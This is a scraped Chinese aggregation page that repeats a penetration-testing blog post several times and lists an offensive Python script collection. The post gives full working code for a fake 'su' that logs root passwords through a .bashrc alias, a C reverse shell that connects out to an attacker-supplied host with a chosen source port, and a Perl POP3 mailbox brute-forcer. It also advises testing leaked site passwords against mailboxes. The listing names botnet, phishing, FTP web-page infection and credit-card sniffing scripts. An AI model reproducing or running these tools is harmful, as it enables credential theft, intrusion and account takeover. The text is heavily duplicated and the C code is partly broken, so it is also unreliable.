精华内容
下载资源
问答
  • 作者及联系方式作者:冰河QQ:2711098650微信公众号: 冰河技术工具简述本项目均为冰河亲自编写并整理的Python渗透脚本集合,可直接拿来用于渗透实战脚本说明com.binghe.hacker.tools.script.attack.crypt 包下的...

    作者及联系方式

    作者:冰河

    QQ:2711098650

    微信公众号: 冰河技术

    工具简述

    本项目均为冰河亲自编写并整理的Python渗透脚本集合,可直接拿来用于渗透实战

    脚本说明

    com.binghe.hacker.tools.script.attack.crypt 包下的脚本:

    1.crypt_attack.py: 利用字典破解Unix/Linux口令

    com.binghe.hacker.tools.script.attack.ssh 包下的脚本

    1. pxssh_connection.py: 使用pexpect中的pxssh模块连接ssh, 需要在Linux下执行

    2. ssh_attack.py: 暴力破解SSH

    3. ssh_botnet.py: 构建SSH僵尸网络,批量向多个SSH终端发送执行命令,达到批量控制目标主机的目的

    4. ssh_connection.py: 连接ssh,需要在Linux下执行

    5. ssh_dsa_attack.py: 利用ssh密钥暴力破解SSH

    com.binghe.hacker.tools.script.attack.zip 包下的脚本

    1. attack_zip.py: 暴力破解zip文件

    2. attack_zip_input_args.py: 暴力破解zip文件

    com.binghe.hacker.tools.script.attack.ftp 包下的脚本

    1. ftp_anonymous.py: 确定一个FTP服务器是否允许匿名登录,允许则返回True,不允许返回False

    2. ftp_brute.py: 根据用户名:密码字典暴力爆破FTP服务器

    3. ftp_web_page.py: 在FTP服务器上搜索网页

    4. ftp_inject.py: 感染FTP上的网页

    5. ftp_attack_web_page.py: 完整的感染FTP服务器上的网页脚本

    com.binghe.hacker.tools.script.attack.metasploit 包下的脚本

    1. conficker.rc: Metasploit脚本,在Kali命令行中运行msfconsole -r conficker.rc 即可运行该脚本

    2. metasploit_attack.py: 利用Metasploit实施攻击的脚本,主要针对Windows系统

    com.binghe.hacker.tools.script.attack.0day 包下的脚本

    1.zeroday_ftp_attack.py: 0day漏洞利用脚本,针对FreeFloat FTP

    2.zeroday_ftp_attack2.py: 0day漏洞利用脚本,针对FreeFloat FTP

    com.binghe.hacker.tools.script.net 包下的脚本

    1. windows_reg_net.py: 列举Windows注册表中存储的网络名和默认网关的Mac

    2. windows_reg_net_location.py: 列举Windows注册表中存储的网络名和默认网关的Mac,并通过https://wigle.net查询物理位置

    3. windows_net_location.py: 测试Mac地址的地理位置

    com.binghe.hacker.tools.script.recycle 包下的脚本

    1. windows_recycle_recovery.py: 查找系统中所有用户对应的回收站中的文件,并打印出来

    com.binghe.hacker.tools.script.meta 包下的脚本

    1. meta_pdf.py: 分析PDF文件中的元数据信息

    2. meta_image.py: 下载链接中的所有图片,并检查每张图片中的GPS元数据,若存在GPS元数据,在打印此文件存在GPS元数据

    3. meta_skype_sqlite3.py: 检查Skype数据库,把账户信息、联系人地址、通话记录以及存放在数据库中的消息打印出来

    4. meta_firefox_sqlite3.py: 查询火狐浏览器存储的上网记录

    5. meta_sms_ios.py: 提取IOS备份中的所有短信记录

    com.binghe.hacker.tools.script.network.pcap 包下的脚本

    1. GeoLiteCity.dat: IP的地理位置数据库

    2. search_ip_geolitecity.py: 使用GeoLiteCity.dat数据库查询指定IP的位置信息

    3. data.pcap: 数据包文件,供测试分析数据包用

    4. analysis_pcap_dpkt.py: 使用dpkt分析pcap数据包

    5. analysis_pcap.py: 分析pcap数据包,可以直接看到数据包的源和目标的物理位置,此脚本是其他三个脚本的最终整合版

    6. analysis_pcap_kml.py: 分析pcap文件,并将分析结果生成KML文件在Google地球上标注

    com.binghe.hacker.tools.script.network.loic 包下的脚本

    1. analysis_dpkt_loic.py: 使用Dpkt发现下载LOIC的行为

    2. analysis_pcap_irc.py: 解析HIVE服务器上的IRC命令

    3. analysis_loic_online.py: 实时检测DDos攻击

    4. analysis_loic.py: 分析loic, 实时检测DDos攻击,此脚本为analysis_dpkt_loic.py、analysis_loic_online.py、analysis_pcap_irc.py 三个脚本的整合

    com.binghe.hacker.tools.script.network.scapy 包下的脚本

    1. scapy_ip_ttl.py: 检测数据包中的TTL值是否为假,如果是假的则打印出来,此脚本可检测nmap是否启用了伪装源IP扫描

    2. scapy_dns_fast_flux.py 用Scapy找出flux流量

    3. scapy_dns_domain_flux.py: 用Scapy找出Domain Flux流量

    com.binghe.hacker.tools.script.network.syn 包下的脚本

    1. scapy_syn_flood.py: 使用Scapy制造SYN泛洪攻击

    2. scapy_syn_tcp.py: 读取TCP序列号

    3. scapy_syn_forge.py: 伪造TCP连接

    4. scapy_syn.py: 使用Scapy制造SYN泛洪攻击、读取TCP序列号并伪造TCP连接; 此脚本是scapy_syn_flood.py、scapy_syn_forge.py和scapy_syn_tcp.py的整合版

    com.binghe.hacker.tools.script.network.warn 包下的脚本

    1. scapy_warn_data.py:产生大量警报的工具包,分析人员也可以使用这个工具来验证IDS是否能够正确识别出恶意流量

    2. scapy_warn.py: 生成触发拒绝服务攻击、漏洞利用(exploits)和踩点扫描警报的数据包

    com.binghe.hacker.tools.script.network.wireless 包下的脚本

    此包下的如下脚本均需要将网卡设置为监听模式:

    1. wireless_scapy_sniffer.py: 侦听无线网卡数据流量

    2. wireless_regex.py: 正则表达式验证American Express信用卡

    3. wireless_express.py: 嗅探无线数据包中的信用卡信息

    4. wireless_customer_info.py: 截获宾馆中无线数据流量中的用户信息

    5. wireless_google.py: 抓取Google搜索数据并实施显示的无线网络数据包嗅探器

    6. wireless_ftp.py: 嗅探FTP登录口令

    7. wireless_probe.py: 发现802.11请求

    8. wireless_hidden.py: 找出隐藏的802.11网络的网络名

    9. wireless_dup.py: 复制RadioTap、802.11、SNAP、LLC、IP和UDP层中的信息

    10. wireless_airplain.py: 截获无人机

    11. wireless_cookie_wordpress_print.py: 解析Wordpress HTTP会话

    12. wireless_cookie_wordpress_find_attack.py: 检测企图盗用Wordpress会话的人,并将结果显示在屏幕上

    com.binghe.hacker.tools.script.network.bluetooth 包下的脚本

    1. bluetooth_discorver.py: 发现周围的蓝牙设备,并把蓝牙设备的名字和Mac地址输出到屏幕

    2. bluetooth_discover_circle.py: 持续监听新的蓝牙设备

    3. bluetooth_rfcomm_channel.py: 检测RFCOMM通道是否开放并处于监听状态

    4. bluetooth_rfcomm_protocol.py: 使用蓝牙服务发现协议打印蓝牙设备的服务名称、协议和端口号

    5. bluetooth_obexftp.py 用Python ObexFTP控制打印机

    6. bluetooth_phone.py: 窃取手机电话簿信息

    com.binghe.hacker.tools.script.network.spy 包下的脚本

    1. mechanize_website_source.py: 用mechanize解析网站源代码

    2. mechainze_proxy.py: mechainze代理

    3. mechainze_website_cookie.py: 打印网站的cookie

    4. mechainze_user_agent.py: 修改访问网站的user-agent

    5. mechainze_browser.py: 自定义浏览器(匿名)

    6. mechainze_browser_test.py: 测试自定义浏览器,可打印多个不同的cookie

    7. mechainze_browser_links.py: 分析并打印网页上的链接

    8. mechainze_browser_imgs.py: 从网站上下载图片,并直接写入硬盘

    9. mechainze_google.py: 与Google API交互

    10. mechainze_twitter.py: 从Twitter上获取数据

    11. mechainze_twitter_locate.py: 从推文中获取地理位置信息

    12. mechainze_twitter_hobby.py: 用正则表达式解析Twitter用户的兴趣爱好

    com.binghe.hacker.tools.script.network.email 包下的脚本

    1. smtplib_send_email.py: 使用smtplib发送电子邮件

    2. smtp_twitter_send_mail.py: 利用目标对象留在Twitter中可以公开的访问的信息对他发送邮件进行钓鱼攻击

    3. mechainze_browser.py: 自定义浏览器类

    4. mechainze_twitter_hobby.py: 用正则表达式解析Twitter用户的兴趣爱好

    com.binghe.hacker.tools.script.network.ak 免杀包下的脚本

    1. bindshell.py: 生成绑定1337端口的Shell

    2. check_virus.py: 将生成的bindshell.exe提交到vscan.novirusthanks.org检测

    com.binghe.hacker.tools.script.scanner 包下的脚本

    1. scan_host_ports.py: 端口扫描器

    2. scan_nmap.py: 使用nmap进行扫描

    出现率高的密码

    aaa

    academia

    anything

    coffee

    computer

    cookie

    oracle

    password

    secret

    super

    unknown

    免责声明

    以上脚本只限于对自己做的项目进行安全测试,不可用于其他,如果在使用过程中出现任何违法违规事件,均与作者本人无关。

    扫一扫关注微信公众号

    你在刷抖音,玩游戏的时候,别人都在这里学习,成长,提升,人与人最大的差距其实就是思维。你可能不信,优秀的人,总是在一起。

    扫一扫关注冰河技术微信公众号

    展开全文
  • 0x00渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。0x01记录root密码小工具root.pyDefault#!/usr/bin/...

    0x00

    渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

    0x01

    记录root密码小工具

    root.py

    Default

    #!/usr/bin/python

    import os, sys, getpass, time

    current_time = time.strftime("%Y-%m-%d %H:%M")

    logfile="/dev/shm/.su.log" //密码获取后记录在这里

    #CentOS

    #fail_str = "su: incorrect password"

    #Ubuntu

    #fail_str = "su: Authentication failure"

    #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样

    fail_str = "su: incorrect password"

    try:

    passwd = getpass.getpass(prompt='Password: ');

    file=open(logfile,'a')

    file.write("[%s]t%s"%(passwd, current_time)) //截取root密码

    file.write('n')

    file.close()

    except:

    pass

    time.sleep(1)

    print fail_str //打印切换root失败提示

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    #!/usr/bin/python

    importos,sys,getpass,time

    current_time=time.strftime("%Y-%m-%d %H:%M")

    logfile="/dev/shm/.su.log"//密码获取后记录在这里

    #CentOS

    #fail_str = "su: incorrect password"

    #Ubuntu

    #fail_str = "su: Authentication failure"

    #For Linux Korea                    //centos,ubuntu,korea 切换root用户失败提示不一样

    fail_str="su: incorrect password"

    try:

    passwd=getpass.getpass(prompt='Password: ');

    file=open(logfile,'a')

    file.write("[%s]t%s"%(passwd,current_time))//截取root密码

    file.write('n')

    file.close()

    except:

    pass

    time.sleep(1)

    printfail_str//打印切换root失败提示

    渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

    0x02

    设置源端口反弹shell

    渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,

    Ping了下百度 可以ping通,

    那真相只有一个

    服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

    比如

    只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。

    谷歌程序无果,自己查了相关api后写了个。

    client-port.c

    Default

    #include <stdio.h>

    #include <sys/types.h>

    #include <sys/socket.h>

    #include <netinet/in.h>

    #include <netdb.h>

    void error(char *msg)

    {

    perror(msg);

    exit(0);

    }

    int main(int argc, char *argv[])

    {

    int sockfd, portno, lportno,n;

    struct sockaddr_in serv_addr;

    struct sockaddr_in client_addr;

    struct hostent *server;

    char buffer[256];

    if (argc < 3) {

    fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);

    exit(0);

    } //三个参数,目标主机,目标主机端口,本地源端口

    portno = atoi(argv[2]);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    if (sockfd < 0)

    error("ERROR opening socket");

    bzero((char *) &client_addr, sizeof(client_addr));

    lportno = atoi(argv[3]);

    client_addr.sin_family = AF_INET;

    client_addr.sin_addr.s_addr = INADDR_ANY;

    client_addr.sin_port = htons(lportno); //设置源端口

    if (bind(sockfd, (struct sockaddr *) &client_addr,

    sizeof(client_addr)) < 0)

    error("ERROR on binding");

    server = gethostbyname(argv[1]);

    if (server == NULL) {

    fprintf(stderr,"ERROR, no such host ");

    exit(0);

    }

    bzero((char *) &serv_addr, sizeof(serv_addr));

    serv_addr.sin_family = AF_INET;

    bcopy((char *)server->h_addr,

    (char *)&serv_addr.sin_addr.s_addr,

    server->h_length);

    serv_addr.sin_port = htons(portno);

    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接

    error("ERROR connecting");

    dup2(fd, 0);

    dup2(fd, 1);

    dup2(fd, 2);

    execl("/bin/sh","sh -i", NULL); //执行shell

    close(fd);

    }

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34

    35

    36

    37

    38

    39

    40

    41

    42

    43

    44

    45

    46

    47

    48

    49

    50

    51

    52

    53

    54

    55

    #include <stdio.h>

    #include <sys/types.h>

    #include <sys/socket.h>

    #include <netinet/in.h>

    #include <netdb.h>

    voiderror(char*msg)

    {

    perror(msg);

    exit(0);

    }

    intmain(intargc,char*argv[])

    {

    intsockfd,portno,lportno,n;

    structsockaddr_inserv_addr;

    structsockaddr_inclient_addr;

    structhostent *server;

    charbuffer[256];

    if(argc<3){

    fprintf(stderr,"usage %s hostname port LocalPortn",argv[0]);

    exit(0);

    }//三个参数,目标主机,目标主机端口,本地源端口

    portno=atoi(argv[2]);

    sockfd=socket(AF_INET,SOCK_STREAM,0);

    if(sockfd<0)

    error("ERROR opening socket");

    bzero((char*)&client_addr,sizeof(client_addr));

    lportno=atoi(argv[3]);

    client_addr.sin_family=AF_INET;

    client_addr.sin_addr.s_addr=INADDR_ANY;

    client_addr.sin_port=htons(lportno);//设置源端口

    if(bind(sockfd,(structsockaddr *)&client_addr,

    sizeof(client_addr))<0)

    error("ERROR on binding");

    server=gethostbyname(argv[1]);

    if(server==NULL){

    fprintf(stderr,"ERROR, no such host ");

    exit(0);

    }

    bzero((char*)&serv_addr,sizeof(serv_addr));

    serv_addr.sin_family=AF_INET;

    bcopy((char*)server->h_addr,

    (char*)&serv_addr.sin_addr.s_addr,

    server->h_length);

    serv_addr.sin_port=htons(portno);

    if(connect(sockfd,&serv_addr,sizeof(serv_addr))<0)//连接

    error("ERROR connecting");

    dup2(fd,0);

    dup2(fd,1);

    dup2(fd,2);

    execl("/bin/sh","sh -i",NULL);//执行shell

    close(fd);

    }

    用法:

    Default

    gcc client-port.c -o port

    1

    gccclient-port.c-oport

    Default

    chmod +x port

    1

    chmod+xport

    Default

    ./port 你的IP 你的监听端口 本地的源端口

    1

    ./port你的IP你的监听端口本地的源端口

    成功反弹shell 提权成功

    0x03邮箱爆破脚本

    某个时候 需要爆破一批邮箱

    Burp163.pl

    Default

    #!/usr/bin/perl

    use Net::POP3;

    $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    print $pop->banner();

    $pop->quit;

    $i=0;

    open(fp1,"user.txt");

    @array1=<fp1>;

    open(fp2,"pass.txt");

    @array2=<fp2>; //从文件中获取邮箱用户名及密码

    foreach $a(@array1) {

    $u=substr($a,0,length($a)-1);

    $u=$u."@163.com";

    foreach $b(@array2) {

    $p=substr($b,0,length($b)-1);

    print "cracked with ".$u."-----".$p."n";

    $i=$i+1;

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    $m=$pop->login($u,$p); //尝试登录邮箱

    if($m>0)

    {

    print $u."------------".$p."----"."success"."n";

    $pop->quit;

    } //成功登录

    else

    {

    print $u."------------".$p."----"."failed"."n";

    $pop->quit; //登录失败

    }

    }

    }

    print $i;

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    #!/usr/bin/perl

    useNet::POP3;

    $email="pop.163.com";//设置pop服务器地址 qq为pop.qq.com

    $pop=Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");

    print$pop->banner();

    $pop->quit;

    $i=0;

    open(fp1,"user.txt");

    @array1=<fp1>;

    open(fp2,"pass.txt");

    @array2=<fp2>;//从文件中获取邮箱用户名及密码

    foreach$a(@array1){

    $u=substr($a,0,length($a)-1);

    $u=$u."@163.com";

    foreach$b(@array2){

    $p=substr($b,0,length($b)-1);

    print"cracked with ".$u."-----".$p."n";

    $i=$i+1;

    $pop=Net::POP3->new($email)ordie("ERROR: Unable to initiate. ");

    $m=$pop->login($u,$p);//尝试登录邮箱

    if($m>0)

    {

    print$u."------------".$p."----"."success"."n";

    $pop->quit;

    }//成功登录

    else

    {

    print$u."------------".$p."----"."failed"."n";

    $pop->quit;//登录失败

    }

    }

    }

    print$i;

    用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

    Default

    $email="pop.163.com";

    1

    $email="pop.163.com";

    再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去

    同目录user.txt中吗,再将字典存进去pass.txt

    你会说

    这个有点鸡肋吧 万一邮箱的密码很复杂

    呵呵

    搞到了一个小站的数据,

    用这个程序批量测试密码是否就是邮箱密码 呵呵

    我啥都没说。

    0x04

    这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。

    赏金发放情况:本文获得赏金150RMB,已于4.15日发放到作者账号。

    征稿启事:91RI一直相信“你不与人分享,谁与你分享”,分享的确是件非常有意义的事情。为了让优秀的同学有 地方分享自己的独到见解,也为了让更多同学从分享中受益,同时我们也希望给那些愿意分享的小伙伴们一点点心意作为感谢,所以我们隆重了推出“有奖征文”活 动!本次活动的详情可以围观《征稿启事》

    展开全文
  • 摘要0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。0x00渗透的很多时候,找到的.../usr/bin/python im...

    摘要

    0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

    0x00

    渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

    0x01

    记录root密码小工具

    root.py

    #!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfile="/dev/shm/.su.log" //密码获取后记录在这里 #

    渗透linux拿到低权限并

    0x02

    设置源端口反弹shell

    渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,

    Ping了下百度 可以ping通,

    那真相只有一个

    服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

    比如

    只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。

    谷歌程序无果,自己查了相关api后写了个。

    client-port.c

    #include <stdio.h> #i

    用法:

    gcc client-port.c -o port

    chmod +x port

    ./port  你的IP 你的监听端口 本地的源端口

    如 ./port  http://www.91ri.org  80  80

    成功反弹shell

    如 ./port  http://www.91ri.org  80  80

    成功反弹shell 提权成功

    0x03 邮箱爆破脚本

    某个时候 需要爆破一批邮箱

    #!/usr/bin/perl use Net::POP3; $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); print $pop->banner(); $pop->quit; $i=0; open(fp1,"user.txt"); @array1=<fp1>; open(fp2,"pass.txt"); @array2=<fp2>; //从文件中获取邮箱用户名及密码 foreach $a(@array1) { $u=substr($a,0,length($a)-1); $u=$u."@163.com"; foreach $b(@array2) { $p=substr($b,0,length($b)-1); print "cracked with ".$u."-----".$p."n"; $i=$i+1; $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); $m=$pop->login($u,$p); //尝试登录邮箱 if($m>0) { print $u."------------".$p."----"."success"."n"; $pop->quit; } //成功登录 else { print $u."------------".$p."----"."failed"."n"; $pop->quit; //登录失败 } } } print $i;

    用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

    $email="pop.163.com";

    再将去除掉@后面部分的邮箱地址比如[email protected] 去除后lusiyu存进去

    同目录user.txt中吗,再将字典存进去pass.txt

    你会说

    这个有点鸡肋吧 万一邮箱的密码很复杂

    呵呵

    搞到了一个小站的数据,

    用这个程序批量测试密码是否就是邮箱密码 呵呵

    我啥都没说。

    0x04

    这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。

    http://www.91ri.org/8680.html

    展开全文
  • 0×00渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。0×01记录root密码小工具root.py#!/usr/bin/python...

    0×00

    渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

    0×01

    记录root密码小工具

    root.py

    #!/usr/bin/python

    import os, sys, getpass, time

    current_time = time.strftime("%Y-%m-%d %H:%M")

    logfile="/dev/shm/.su.log" //密码获取后记录在这里

    #CentOS

    #fail_str = "su: incorrect password"

    #Ubuntu

    #fail_str = "su: Authentication failure"

    #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样

    fail_str = "su: incorrect password"

    try:

    passwd = getpass.getpass(prompt='Password: ');

    file=open(logfile,'a')

    file.write("[%s]t%s"%(passwd, current_time)) //截取root密码

    file.write('n')

    file.close()

    except:

    pass

    time.sleep(1)

    print fail_str //打印切换root失败提示

    渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

    0×02

    设置源端口反弹shell

    渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,

    Ping了下百度 可以ping通,

    那真相只有一个

    服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

    比如

    只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。

    谷歌程序无果,自己查了相关api后写了个。

    client-port.c

    #include

    #include

    #include

    #include

    #include

    void error(char *msg)

    {

    perror(msg);

    exit(0);

    }

    int main(int argc, char *argv[])

    {

    int sockfd, portno, lportno,n;

    struct sockaddr_in serv_addr;

    struct sockaddr_in client_addr;

    struct hostent *server;

    char buffer[256];

    if (argc < 3) {

    fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);

    exit(0);

    } //三个参数,目标主机,目标主机端口,本地源端口

    portno = atoi(argv[2]);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    if (sockfd < 0)

    error("ERROR opening socket");

    bzero((char *) &client_addr, sizeof(client_addr));

    lportno = atoi(argv[3]);

    client_addr.sin_family = AF_INET;

    client_addr.sin_addr.s_addr = INADDR_ANY;

    client_addr.sin_port = htons(lportno); //设置源端口

    if (bind(sockfd, (struct sockaddr *) &client_addr,

    sizeof(client_addr)) < 0)

    error("ERROR on binding");

    server = gethostbyname(argv[1]);

    if (server == NULL) {

    fprintf(stderr,"ERROR, no such host ");

    exit(0);

    }

    bzero((char *) &serv_addr, sizeof(serv_addr));

    serv_addr.sin_family = AF_INET;

    bcopy((char *)server->h_addr,

    (char *)&serv_addr.sin_addr.s_addr,

    server->h_length);

    serv_addr.sin_port = htons(portno);

    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接

    error("ERROR connecting");

    dup2(fd, 0);

    dup2(fd, 1);

    dup2(fd, 2);

    execl("/bin/sh","sh -i", NULL);//执行shell

    close(fd);

    }

    用法:

    gcc client-port.c -o port

    chmod +x port

    ./port 你的IP 你的监听端口 本地的源端口

    如 ./port http://www.91ri.org  80  80

    成功反弹shell 提权成功

    0×03

    邮箱爆破脚本

    某个时候 需要爆破一批邮箱

    Burp163.pl

    #!/usr/bin/perl

    use Net::POP3;

    $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    print $pop->banner();

    $pop->quit;

    $i=0;

    open(fp1,"user.txt");

    @array1=;

    open(fp2,"pass.txt");

    @array2=; //从文件中获取邮箱用户名及密码

    foreach $a(@array1) {

    $u=substr($a,0,length($a)-1);

    $u=$u."@163.com";

    foreach $b(@array2) {

    $p=substr($b,0,length($b)-1);

    print "cracked with ".$u."-----".$p."n";

    $i=$i+1;

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    $m=$pop->login($u,$p); //尝试登录邮箱

    if($m>0)

    {

    print $u."------------".$p."----"."success"."n";

    $pop->quit;

    } //成功登录

    else

    {

    print $u."------------".$p."----"."failed"."n";

    $pop->quit; //登录失败

    }

    }

    }

    print $i;

    用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

    $email="pop.163.com";

    再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去

    同目录user.txt中吗,再将字典存进去pass.txt

    你会说

    这个有点鸡肋吧 万一邮箱的密码很复杂

    呵呵

    搞到了一个小站的数据,

    用这个程序批量测试密码是否就是邮箱密码 呵呵

    我啥都没说。

    0×04

    这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。

    赏金发放情况:

    本文获得赏金150RMB,已于4.15日发放到作者账号。

    征稿启事:

    91RI一直相信“你不与人分享,谁与你分享”,分享的确是件非常有意义的事情。为了让优秀的同学有 地方分享自己的独到见解,也为了让更多同学从分享中受益,同时我们也希望给那些愿意分享的小伙伴们一点点心意作为感谢,所以我们隆重了推出“有奖征文”活 动!本次活动的详情可以围观《征稿启事》

    展开全文
  • python窃取摄像头照片源码+获取授权码方法+py打包成exe教你用python做一个属于自己的窃取摄像头照片的软件。需要安装python3.5以上版本,在官网下载即可。然后安装库opencv-python,安装方式为打开终端输入命令行。...
  • python-----从本地摄像头和网络摄像头截取图片 ,具体代码如下所示:import cv2# 获取本地摄像头# folder_path 截取图片的存储目录def get_img_from_camera_local(folder_path):cap = cv2.VideoCapture(0)i = 1while...
  • Python脚本

    2018-08-16 09:03:01
    这是一个Python脚本,可用于渗透测试。通过获取网页的user_token值,破解密码。
  • python渗透测试脚本 学习记录(四) 用python渗透测试脚本——信息收集之基于两种协议的主机发现 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。...
  • python渗透测试脚本 学习记录(二) 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。 ...
  • python code了一篇,为什么用python 因为他开发快,不用各种环境。 from BaseHTTPServer import * import urllib2 class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path...
  • snmp用来获取信息,然后利用获取的信息来进一步的渗透。命令行有snmpwalk -v 2c -c public ip system-c是密码,默认的密码是public利用工具可以找windows下的slarwinds的工具包有个叫 ip browser如果是华为的路由器...
  • python渗透测试脚本——信息收集之爬取邮箱 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高...
  • python渗透测试脚本 学习记录(一) 这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。 ...
  • python渗透

    2017-11-05 17:27:00
    她的相册密码是手机号,先写一个生成手机号的脚本 空间有她之前的手机号,那么她现在的手机号也极有可能是一样的运营商,比如移动(缩小密码范围) 自己新建一个加密相册,通过工具测试,看看成功或失败的response...
  • https://gitee.com/c0ny10/information-collection-demo.git
  • 近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该...
  • 写在前面在渗透中经常要用到脚本来验证漏洞,所以我打算根据漏洞原理,从零开始写一系列脚本。但是python2和python3中还是比较纠结,python2的urllib2显然对这方面更友好一些,但是python2已经是上一个时代的产物,...
  • http://www.2cto.com/Article/201408/322754.html
  • 渗透测试从互联网找到了入侵内网的入口点之后剩下的就内网渗透测试了。  有人说到了内网还不容易,随便拿个hscan一抓一大把弱口令。我同意这个看法,但是在我看来,内网环境复杂得多,要想精确获取自己想要的...
  • 面向渗透测试者的Python 概述 开始使用Python进行渗透测试和红队参与非常容易! 此存储库只是一小部分随机脚本,可以帮助您入门。 带给您的是: 范例:Mike Felch(@ustayready)和Joff Thyer(@joff_thyer) 提供...
  • 渗透用的python脚本之密码破解

    千次阅读 2015-06-09 23:25:06
    FTP暴力破解脚本   ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 ...
  • 一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。端口扫描小脚本:#coding: utf-8import ...
  • 渗透脚本快速生成工具Intersect 当渗透人员获取目标系统的执行权限,往往需要编写相应的脚本,实现更多的渗透操作。Kali Linux提供一款Python脚本快速生成工具Intersect。该...
  • 转载请注明出处:... 脚本一: # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 2019-01-16 # Exploit Author...
  • 0x00 - 前言这是一个跟Metasploit类似的基于web渗透测试平台,平台可以允许加入自定义脚本,只需要提交自定义的脚本并编写脚本对应的web界面模板就可以直接在平台上进行使用,...

空空如也

空空如也

1 2 3 4 5 ... 18
收藏数 360
精华内容 144
关键字:

python渗透脚本

python 订阅